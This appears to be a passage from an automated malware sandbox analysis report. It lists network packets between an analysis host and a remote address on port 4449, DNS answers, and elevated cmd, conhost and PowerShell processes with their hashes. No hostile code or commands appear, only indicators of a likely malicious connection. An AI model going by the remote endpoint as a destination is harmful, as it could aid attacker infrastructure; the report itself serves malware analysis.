Apr 20, 2024 10:22:16.765058041 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:22:16.807192087 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:22:17.006484985 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:22:17.007227898 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:22:17.253151894 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:22:17.253221035 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:22:17.502073050 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Apr 20, 2024 10:18:16.279107094 CEST | 1.1.1.1 | 192.168.2.4 | 0x5f89 | No error (0) | | | 199.232.210.172 | A (IP address) | IN (0x0001) | false |
Apr 20, 2024 10:18:16.279107094 CEST | 1.1.1.1 | 192.168.2.4 | 0x5f89 | No error (0) | | | 199.232.214.172 | A (IP address) | IN (0x0001) | false |
Target ID: | 0 |
Start time: | 10:17:54 |
Start date: | 20/04/2024 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff78a520000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 1 |
Start time: | 10:17:54 |
Start date: | 20/04/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 10:17:54 |
Start date: | 20/04/2024 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff78a520000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 3 |
Start time: | 10:17:54 |
Start date: | 20/04/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 4 |
Start time: | 10:17:54 |
Start date: | 20/04/2024 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff78a520000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 10:17:54 |
Start date: | 20/04/2024 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff788560000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 10:17:57 |
Start date: | 20/04/2024 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff788560000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Execution Graph
Execution Coverage: | 1.7% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 0% |
Total number of Nodes: | 8 |
Total number of Limit Nodes: | 1 |
Function 00007FFD9B9715BD Relevance: .6, Instructions: 637 COMMON
Function 00007FFD9B8A0E32 Relevance: .3, Instructions: 292 COMMON